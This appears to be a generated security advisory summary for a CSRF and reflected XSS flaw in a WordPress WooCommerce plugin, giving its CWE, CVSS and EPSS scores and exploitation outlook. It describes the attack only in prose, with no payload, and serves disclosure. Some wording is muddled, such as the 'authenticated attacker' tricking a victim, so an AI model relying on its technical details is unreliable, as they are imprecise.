The vulnerability is a CSRF condition that allows an attacker to inject arbitrary JavaScript into the response of a reflected XSS sink. When an authenticated attacker tricks the victim into submitting a crafted request, the plugin reflects unsanitized user input back into the page, enabling script execution that can steal cookies, deface the site, or perform actions on behalf of the victim. The weakness maps to CWE‑352. The impact is the compromise of confidentiality, integrity, and availability of the website and any logged‑in users.

The flaw affects the WordPress plugin Softagon WooCommerce Products without Featured Images, version 0.1 and all prior releases. It is used on sites running WordPress with WooCommerce, regardless of the specific themes or other plugins installed.

The CVSS score of 7.1 indicates high severity, but the EPSS score is below 1%, suggesting very low exploitation probability at this time. The vulnerability is not listed in the CISA KEV catalog, so no known large‑scale exploitation has been reported. The likely attack path requires the attacker to obtain a victim’s browser session or trick a legitimate user into visiting a crafted URL, which is inferred from the CSRF nature of the flaw. Given these conditions, the risk is moderate to high if the plugin is actively used, but the actual likelihood of exploitation remains low unless automated or widespread CSRF campaigns target it.